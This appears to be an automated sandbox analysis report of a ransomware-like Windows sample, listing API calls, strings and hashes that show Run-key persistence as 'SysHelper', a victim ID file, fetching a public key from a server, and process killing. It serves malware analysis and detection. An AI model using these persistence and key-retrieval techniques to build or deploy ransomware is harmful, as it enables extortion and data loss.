                                                                                      • _wcsstr.LIBCMT ref: 00454A8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                      • String ID: Service-0x$_OPENSSL_isservice
                                                                                      • API String ID: 2112994598-1672312481
                                                                                      • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                      • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                      • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                      • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                      • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                      • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                        • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                      • vswprintf.LIBCMT ref: 00454B5D
                                                                                      • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                      • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                      • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                      • MessageBoxA.USER32 ref: 00454BD3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                      • String ID: OPENSSL$OpenSSL: FATAL
                                                                                      • API String ID: 277090408-1348657634
                                                                                      • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                      • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                      • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                      • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

                                                                                      APIs
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                      • _memset.LIBCMT ref: 004123B6
                                                                                      • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                      • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                      • lstrcpyW.KERNEL32 ref: 0041240E
                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                      • SysHelper, xrefs: 004123D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                      • API String ID: 122392481-4165002228
                                                                                      • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                      • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                      • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                      • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                      • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                      • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                      • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                        • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                      • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                      • String ID: bad function call
                                                                                      • API String ID: 2464034642-3612616537
                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 004235B1
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                      • __gmtime64_s.LIBCMT ref: 00423680
                                                                                      • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                      • __allrem.LIBCMT ref: 004236F3
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                      • __allrem.LIBCMT ref: 00423726
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                      • __allrem.LIBCMT ref: 0042375B
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                      • String ID:
                                                                                      • API String ID: 1503770280-0
                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                      • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                      • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                      • API String ID: 1717984340-2085858615
                                                                                      • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                      • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                      • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                      • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                      • _fgetws.LIBCMT ref: 0040C7BC
                                                                                      • _memmove.LIBCMT ref: 0040C89F
                                                                                      • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                      • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                      • API String ID: 2864494435-54166481
                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                      • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                      • String ID: cmd.exe
                                                                                      • API String ID: 2696918072-723907552
                                                                                      • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                      • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                      • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                      • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                      • API String ID: 2574300362-2555811374
                                                                                      • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                      • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                      • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                      • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                      • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                      • API String ID: 1783060780-3771355929
                                                                                      • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                      • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                      • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                      • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncmp
                                                                                      • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                      • API String ID: 909875538-2908105608
                                                                                      • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                      • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                      • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                      • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                      • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseValue$OpenQuery
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                      • API String ID: 3962714758-1667468722
                                                                                      • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                      • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                      • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                      • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0041E707
                                                                                        • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                      • InternetOpenW.WININET ref: 0041E743
                                                                                      • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                      • _memmove.LIBCMT ref: 0041E838
                                                                                      • lstrcpyW.KERNEL32 ref: 0041E90A
                                                                                      • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                      • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                      • _strstr.LIBCMT ref: 0041EA36
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                      • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                      • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                      • lstrcpyW.KERNEL32 ref: 0041EB5B
                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                      • _malloc.LIBCMT ref: 0041EB86
                                                                                      • _memset.LIBCMT ref: 0041EB94
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                      • lstrcpyW.KERNEL32 ref: 0041EBB6
                                                                                      • _strstr.LIBCMT ref: 0041EBDA
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                      • String ID: bowsakkdestx.txt${"public_key":"
                                                                                      • API String ID: 2805819797-1771568745
                                                                                      • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                      • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                      • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                      • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                      • API String ID: 1302938615-3129329331
                                                                                      • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                      • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                      • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                      • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ___unDName.LIBCMT ref: 0043071B
                                                                                      • _strlen.LIBCMT ref: 0043072E
                                                                                      • __lock.LIBCMT ref: 0043074A
                                                                                      • _malloc.LIBCMT ref: 0043075C
                                                                                      • _malloc.LIBCMT ref: 0043076D
                                                                                      • _free.LIBCMT ref: 004307B6
                                                                                        • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                      • _free.LIBCMT ref: 004307AF
                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                      • String ID:
                                                                                      • API String ID: 3704956918-0
                                                                                      • Opcode ID: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                                                                      • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                                                                      • Opcode Fuzzy Hash: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                                                                      • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __init_pointers.LIBCMT ref: 00425141
                                                                                        • Part of subcall function 00427D6C: RtlEncodePointer.NTDLL(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                        • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                        • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                      • __mtinitlocks.LIBCMT ref: 00425146
                                                                                      • __mtterm.LIBCMT ref: 0042514F
